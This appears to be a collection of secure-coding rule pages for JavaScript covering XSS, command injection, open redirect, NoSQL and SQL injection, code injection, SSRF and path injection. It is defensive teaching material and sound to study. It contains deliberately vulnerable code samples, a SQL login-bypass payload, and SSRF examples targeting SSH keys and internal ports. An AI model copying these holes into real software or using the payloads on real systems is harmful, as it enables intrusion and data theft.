const queryParams = new URLSearchParams(document.location.search);
const input = queryParams.get("input");

rootEl.innerText = input;

How does this work?

In general, one should limit the use of dangerous properties and methods, such as Element.innerHTML or Document.write(), as there exist many ways for an attacker to exploit their usage. Instead, prefer the usage of safe alternatives such as HTMLElement.innerText or Node.textContent. Furthermore, frameworks such as React or Vue.js will automatically escape variables used in views, making it much harder to accidentally write vulnerable code.

If these options are not possible, sanitization of the attacker-controllable input should be preferred.

Sanitization of user-supplied data

By systematically encoding data that is written to the DOM, it is possible to prevent XSS attacks. In this case, the goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

However, selecting an encoding that is guaranteed to be safe can be a complex task. XSS exploitation techniques vary depending on the HTML context where malicious input is injected. As a result, a combination of HTML encoding, URL encoding and JavaScript escaping may be required, depending on the context. OWASP’s DOM-based XSS Prevention Cheat Sheet goes into more detail about the required sanitization.
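
As a sketch of encoding for the HTML element context only (other contexts need their own encoders, and a vetted library should be preferred in practice; the function name is illustrative):

```javascript
// Replaces the characters that are significant in an HTML element or
// attribute context, so browsers render the value as plain text.
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```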

Though browsers do not yet provide any direct API to do this sanitization, the DOMPurify library offers extensive functionality to prevent XSS and has been tested by a large user base.

Pitfalls

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

For example, filtering out user inputs based on a denylist will never fully prevent XSS vulnerabilities from being exploited. This practice is sometimes used by web application firewalls. Time and time again, malicious users are able to find the exploitation payload that will defeat the filters of these firewalls.

Another common approach is to parse HTML and strip sensitive HTML tags. Again, this denylist approach is vulnerable by design: maintaining a list of sensitive HTML tags is very difficult in the long run.

Modification after sanitization

Caution should be taken if the user-supplied data is further modified after this data was sanitized. Doing so might void the effects of sanitization and introduce new XSS vulnerabilities. In general, modification of this data should occur beforehand instead.

Going the extra mile

Content Security Policy

With a defense-in-depth security approach, a Content Security Policy (CSP) can be added through the Content-Security-Policy HTTP header, or using a <meta> element. The CSP aims to mitigate XSS attacks by instructing client browsers not to load data that does not meet the application’s security requirements.

Server administrators can define an allowlist of domains that contain valid scripts, which will prevent malicious scripts (not stored on one of these domains) from being executed. If script execution is not needed on a certain webpage, it can also be blocked altogether.
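
A sketch of such a policy being set from an Express-style middleware; the policy string and the scripts.example.com origin are illustrative assumptions, not recommendations:

```javascript
// Adds a restrictive Content-Security-Policy header to every response.
function cspMiddleware(req, res, next) {
  res.setHeader(
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self' https://scripts.example.com"
  );
  next();
}
```

With Express, it would be registered with app.use(cspMiddleware).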

Resources

Documentation

Articles & blog posts

Standards

jssecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Node.js

Code examples

The following code is vulnerable to command injection because it uses untrusted input to set up a new process. Therefore, an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

const { execSync } = require('child_process')

cmd = req.query.cmd
execSync(cmd) // Noncompliant

Compliant solution

const { spawnSync } = require('child_process')

const cmdId = parseInt(req.query.cmdId)
let host = req.query.host
host = typeof host === "string" ? host : "example.org"

const allowedCommands = [
    {exe:"/bin/ping", args:["-c","1","--"]},
    {exe:"/bin/host", args:["--"]}
]
const cmd = allowedCommands[cmdId]
if (cmd) {
    spawnSync(cmd.exe, cmd.args.concat(host))
}

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple regexes to avoid ReDOS attacks. For example, you can accept only a specific set of executables, by using ^/bin/(ls|pwd|grep)$.
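
A sketch of that regex-based allow list:

```javascript
// Only these three absolute paths are accepted; anything else, including
// paths with appended shell metacharacters, is rejected.
const allowedExecutable = /^\/bin\/(ls|pwd|grep)$/;

function isAllowedExecutable(path) {
  return allowedExecutable.test(path);
}
```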

Important note: The application must do validation on the server side, not on client-side front ends.

In the example compliant code, a static list of trusted commands is used. Users are only allowed to submit an index in this array in place of a full command name.

Neutralize special characters

If the application is to execute complex commands that cannot be restricted to a pre-approved list, the cleanest approach is to use components that handle argument escaping for you, such as child_process.spawn.

The library helps you to get rid of common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • `
  • \
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters include ', -, and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In such cases, option processing can be terminated with the -- marker or with dedicated options. For example, git supports --end-of-options since version 2.24.

In the example compliant code, the spawnSync function from child_process is used in place of its less secure exec counterpart. It accepts command arguments as an array and passes them directly to the program, so they cannot be reinterpreted by a shell before the command runs.

Disable shell integration

In most cases, command execution libraries offer two ways to execute an external program: with or without shell integration.

When shell integration is allowed, an attacker with control over the command arguments can simply execute additional external programs using system shell features. For example, on Unix, command pipelining (|) or string interpolation ($(), <(), etc.) can be used to break out of a command call.

Therefore, it is generally preferable to disable shell integration.

The spawnSync function used in the example compliant code disables shell integration by default.

Pitfalls

Loose typing

Because JavaScript is a loosely typed language, extra care should be taken when accepting user-controlled parameters. Indeed, some methods that can be used to process untrusted parameters accept both single objects and arrays of objects.

For example, the Array.prototype.concat function accepts an array as an argument and appends all of its elements to the target array. When an untrusted parameter turns out to be an array where a single string was expected, using concat to build a command argument list can result in arbitrary argument injection.

It is therefore of prime importance to check the type of untrusted parameters before processing them.

In the above compliant code example, the ambiguous concat function is used. However, a type check has been introduced to prevent any unexpected issue.
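
A reusable form of such a type check might look like this (the helper name is illustrative):

```javascript
// Rejects anything that is not a single string, since "extended" query
// parsing can turn ?host=a&host=b into an array.
function asSingleString(value) {
  if (typeof value !== "string") {
    throw new TypeError("expected a single string parameter");
  }
  return value;
}
```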

Resources

Documentation

Standards

jssecurity:S6105

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to build URLs used during redirects.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com/redirect?url=evil.com, to redirect the victim to their evil domain.

Open redirection is most often used to trick users into browsing to a malicious domain that they believe is safe. As such, attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

An attacker can use this vulnerability to redirect a user from a trusted domain to a malicious domain controlled by the attacker. At that point, the attacker can perform various attacks, such as phishing.

Below are some scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Phishing

Suppose the attacker creates a malicious website that mirrors the interface of the trusted website. In that case, they can use the open redirect vulnerability to lead the user to this malicious site.

Due to the similarity in the application appearance and the supposedly trustable hyperlink, the user fails to identify that they are browsing on a malicious domain. From here, an attacker can capture the user’s credentials, bypass Multi-Factor Authentication (MFA), and take over the user’s account on the trusted website.

Malware distribution

By leveraging the domain mirroring technique explained above, the attacker could also create a website that hosts malware. A user who is unaware of the redirection from a trusted website to this malicious website might then download and execute the attacker’s malware. In the worst case, this can lead to a complete system compromise for the user.

JavaScript injection (XSS)

In certain circumstances, an attacker can use DOM-based open redirection to execute JavaScript code. This can lead to further exploitation in the trusted domain and has consequences such as the compromise of the user’s account.

How to fix it in DOM API

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

The following example is vulnerable to open redirection through a URL such as https://example.com/redirect?url=https://evil.com:

const queryParams = new URLSearchParams(document.location.search);
const redirectUrl = queryParams.get("url");
document.location = redirectUrl; // Noncompliant

Compliant solution

const queryParams = new URLSearchParams(document.location.search);
const redirectUrl = queryParams.get("url");

if (redirectUrl && redirectUrl.startsWith("https://www.example.com/")) {
    document.location = redirectUrl;
}

How does this work?

Most client-side frameworks, such as Vue.js or React.js, provide built-in redirection methods. Those should be preferred as they often provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections. Thus, they might not solve the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, the following should be done instead:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allowlist approach in case the destination URLs are multiple but limited.
  3. Adding a dynamic confirmation dialog, warning about the imminent action and requiring manual authorization to proceed to the actual redirection.

Pitfalls

The trap of String.startsWith and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator character (i.e., a /) as the last character.

When this character is not present, attackers may be able to register a specific domain name that both passes validation and is controlled by them.

For example, when validating the https://example.com domain, suppose an attacker owns the https://example.evil domain. If the prefix-based validation is implemented incorrectly, they could create a https://example.com.example.evil subdomain to abuse the broken validation.

The practice of taking over domains that maliciously look like existing domains is widespread and is called cybersquatting.
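
Beyond prefix checks, parsing the URL and comparing its origin exactly avoids this class of bypass (a sketch; https://example.com stands in for the trusted origin):

```javascript
function isTrustedUrl(untrusted) {
  try {
    // URL() rejects relative and malformed inputs; an exact origin
    // comparison cannot be fooled by lookalike subdomains.
    return new URL(untrusted).origin === "https://example.com";
  } catch {
    return false;
  }
}
```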

Resources

Standards

jssecurity:S5147

Why is this an issue?

NoSQL injections occur when an application retrieves untrusted data and inserts it into a database query without sanitizing it first.

What is the potential impact?

In the context of a web application that is vulnerable to NoSQL injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data leakage

In the context of simple query logic breakouts, a malicious database query enables privilege escalation or direct data leakage from one or more databases.
This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) as missing data can disrupt the regular operations of an organization.

Chaining NoSQL injections with other vulnerabilities

Attackers who exploit NoSQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense-in-depth measures because they assume attackers cannot reach certain points in the infrastructure. This oversight can enable multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in MongoDB

Code examples

The following code is vulnerable to a NoSQL injection because the database query is built using untrusted JavaScript objects that are extracted from user inputs.

Here, the application assumes that the user-submitted parameters are always strings, while they might in fact be more complex structures. An array or dictionary input might tamper with the expected query behavior.

Noncompliant code example

const { MongoClient } = require('mongodb');

function (req, res) {
    let query = { user: req.query.user, city: req.query.city };

    MongoClient.connect(url, (err, db) => {
        db.collection("users")
        .find(query) // Noncompliant
        .toArray((err, docs) => { });
    });
}

Compliant solution

const { MongoClient } = require('mongodb');

function (req, res) {
    let query = { user: req.query.user.toString(), city: req.query.city.toString() };

    MongoClient.connect(url, (err, db) => {
        db.collection("users")
        .find(query)
        .toArray((err, docs) => { });
    });
}

How does this work?

Use only plain string values

With MongoDB, NoSQL injection can arise when attackers are able to inject objects into the query instead of plain string values. For example, using the object { $ne: "" } in a field of a find query will return every entry where that field is not empty.

Some JavaScript application servers enable "extended" syntax that serializes URL query parameters into JavaScript objects or arrays. This allows attackers to control all the fields of an object. In express.js, this "extended" syntax is enabled by default.

Before using any untrusted value in a MongoDB query, make sure it is a plain string and not a JavaScript object or an array.
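
A sketch of that check applied to the example query (helper names are illustrative):

```javascript
// Rejects objects and arrays such as { $ne: "" } before they reach the filter.
function requirePlainString(value) {
  if (typeof value !== "string") {
    throw new TypeError("expected a plain string value");
  }
  return value;
}

function buildUserQuery(params) {
  return {
    user: requirePlainString(params.user),
    city: requirePlainString(params.city),
  };
}
```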

In some cases, this will not be enough to protect against all attacks, and strict validation needs to be applied (see the "Pitfalls" section).

Pitfalls

Code execution

When untrusted data is used within query operators such as $where, $accumulator, or $function, it usually results in JavaScript code execution vulnerabilities.

Therefore, untrusted values should not be used inside these query operators unless they are properly validated.

For more information about MongoDB code execution vulnerabilities, see rule S5334.

Resources

Articles & blog posts

Standards

jssecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Node.js

Code examples

The following code is vulnerable to arbitrary code execution because it dynamically runs JavaScript code built from untrusted data.

Noncompliant code example

function (req, res) {
    let operation = req.query.operation
    eval(`product_${operation}()`) // Noncompliant
    res.send("OK")
}

Compliant solution

const allowed = ["add", "remove", "update"]

let operationId = req.query.operationId
const operation = allowed[operationId]
eval(`product_${operation}()`)
res.send("OK")

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code, not its expanded value. The dynamic code can then safely access the untrusted parameter’s content and perform the processing.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

The example compliant code uses such a binding approach.
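A minimal sketch of such a binding, assuming three hypothetical product operations. A Map is used so that prototype-inherited keys such as `constructor` cannot be looked up by accident, and eval() is avoided entirely:

```javascript
// Binding table: identifiers map to the only functions users may trigger.
// The operation names and return values here are illustrative.
const operations = new Map([
  ["add",    () => "added"],
  ["remove", () => "removed"],
  ["update", () => "updated"],
]);

function runOperation(operationId) {
  const operation = operations.get(operationId);
  if (operation === undefined) {
    throw new Error(`Unknown operation: ${operationId}`);
  }
  return operation();
}
```

Any identifier outside the binding, including property names inherited from Object.prototype, is rejected before any code runs.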

Resources

Articles & blog posts

Standards

jssecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Sequelize

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string. The application assumes that incoming data always has a specific range of characters and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.
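The effect of the payload can be reproduced with plain string concatenation (this is only a demonstration of the broken query construction, not database code):

```javascript
// Building the query the same way as the noncompliant example shows how
// the payload rewrites the WHERE clause: OR 1=1 makes the condition
// always true and the trailing "--" comments out the rest of the query.
function buildQuery(user, pass) {
  return `SELECT * FROM users WHERE user = '${user}' AND pass = '${pass}'`;
}

const query = buildQuery("foo' OR 1=1 --", "anything");
```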

Noncompliant code example

async function index(req, res) {
    const { db, User } = req.app.get('sequelize');

    let loggedInUser = await db.query(
        `SELECT * FROM users WHERE user = '${req.query.user}' AND pass = '${req.query.pass}'`,
        {
            model: User,
        }
    ); // Noncompliant

    res.send(JSON.stringify(loggedInUser));
    res.end();
}

Compliant solution

async function index(req, res) {
    const { db, User, QueryTypes } = req.app.get('sequelize');

    let user = req.query.user;
    let pass = req.query.pass;

    let loggedInUser = await db.query(
        `SELECT * FROM users WHERE user = $user AND pass = $pass`,
        {
            bind: {
                user: user,
                pass: pass,
            },
            type: QueryTypes.SELECT,
            model: User,
        }
    );

    res.send(JSON.stringify(loggedInUser));
    res.end();
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string (Java SE syntax):

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, while others do it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

jssecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that the targeted users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in Express.js

Code examples

The following code is vulnerable to cross-site scripting because it returns an HTML response that contains unsanitized user input.

If you do not intend to send HTML code to clients, the vulnerability can be fixed by specifying the type of data returned in the response. For example, you can use the res.json() helper to safely return JSON messages.

Noncompliant code example

function (req, res) {
    const json = JSON.stringify({ "data": req.query.input });
    res.send(json);
};

Compliant solution

function (req, res) {
    res.json({ "data": req.query.input });
};

It is also possible to set the Content-Type header manually using res.set (or the res.type shortcut) when building the response.

Noncompliant code example

function (req, res) {
    res.send(req.query.input);
};

Compliant solution

function (req, res) {
    res.set('Content-Type', 'text/plain');
    res.send(req.query.input);
};

How does this work?

In case the response consists of HTML code, it is highly recommended to use a template engine like ejs to generate it. This template engine separates the view from the business logic and automatically encodes the output of variables, drastically reducing the risk of cross-site scripting vulnerabilities.
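The automatic encoding these engines apply boils down to HTML entity escaping. The sketch below is a simplified illustration of what happens to every interpolated variable, not ejs's actual implementation:

```javascript
// Minimal HTML entity encoding. The ampersand must be replaced first so
// that already-produced entities are not double-escaped.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```

Once encoded this way, an injected payload is rendered as inert text instead of being parsed as markup.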

If you do not intend to send HTML code to clients, the vulnerability can be resolved by telling them what data they are receiving with the content-type HTTP header. This header tells the browser that the response does not contain HTML code and should not be parsed and interpreted as HTML. Thus, the HTTP response is not vulnerable to reflected Cross-Site Scripting.

For example, setting the content-type header to text/plain makes it safe to reflect user input, since browsers will not try to parse and execute the response.

Pitfalls

Content-types

Be aware that content-types other than text/html can allow JavaScript code to be executed in a browser and are thus prone to cross-site scripting vulnerabilities.
The following content-types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent an XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls, but it is only a matter of time before malicious users find an exploitation payload that defeats the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URIs.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
Learn more here.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

jssecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can be either basic or blind, depending on whether the data fetched by the server is directly returned in the web application’s response.
Even when the application does not return the response of the coerced request (blind SSRF), exploitation is still possible, so blind SSRF must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internally accessible ports, on the affected server or on others it can communicate with, by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemes (dependent on the affected system), for example gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Node.js

Code examples

The following code is vulnerable to SSRF as it opens a URL defined by untrusted data.

Noncompliant code example

const axios = require('axios');
const express = require('express');

const app = express();

app.get('/example', async (req, res) => {
    try {
        await axios.get(req.query.url); // Noncompliant
        res.send("OK");
    } catch (err) {
        console.error(err);
        res.send("ERROR");
    }
})

Compliant solution

const axios = require('axios');
const express = require('express');

const app = express();

const schemesList = ["http:", "https:"];
const domainsList = ["trusted1.example.com", "trusted2.example.com"];

app.get('/example', async (req, res) => {
    const url = new URL(req.query.url);

    if (schemesList.includes(url.protocol) && domainsList.includes(url.hostname)) {
        try {
            await axios.get(url.href);
            res.send("OK");
        } catch (err) {
            console.error(err);
            res.send("ERROR");
        }
    } else {
        res.send("INVALID_URL");
    }
})

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.
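The allow-list check from the compliant example can be isolated into a small validator. The scheme and hostname values below mirror the example and are illustrative:

```javascript
// URL allow-list validation: accept only parseable URLs whose scheme and
// hostname are explicitly trusted.
const schemesList = ["http:", "https:"];
const domainsList = ["trusted1.example.com", "trusted2.example.com"];

function isAllowedUrl(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (err) {
    return false; // not a valid absolute URL
  }
  return schemesList.includes(url.protocol) && domainsList.includes(url.hostname);
}
```

Parsing the URL first, rather than inspecting the raw string, ensures the scheme and hostname checks apply to the components the HTTP client will actually use.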

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.
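This bypass can be checked directly. The comparison below contrasts the broken prefix check with an exact hostname comparison after parsing (domain names are illustrative):

```javascript
// A prefix check without a terminating "/" accepts attacker-registered
// domains that merely begin with the trusted string.
const unsafeCheck = (url) => url.startsWith("https://example.com");

// Parsing the URL and comparing the hostname exactly does not have this
// weakness.
const safeCheck = (url) => {
  const { protocol, hostname } = new URL(url);
  return protocol === "https:" && hostname === "example.com";
};
```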

Resources

Standards

jssecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permissions of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Node.js

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to read arbitrary files.

Noncompliant code example

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources/";
  const userFilename = path.join(targetDirectory, req.query.filename);

  let data = fs.readFileSync(userFilename, { encoding: 'utf8', flag: 'r' }); // Noncompliant
}

Compliant solution

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources/";
  let userFilename = path.join(targetDirectory, req.query.filename);
  userFilename = fs.realpathSync(userFilename);

  if (!userFilename.startsWith(targetDirectory)) {
    return res.status(401).send();
  }

  let data = fs.readFileSync(userFilename, { encoding: 'utf8', flag: 'r' });
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
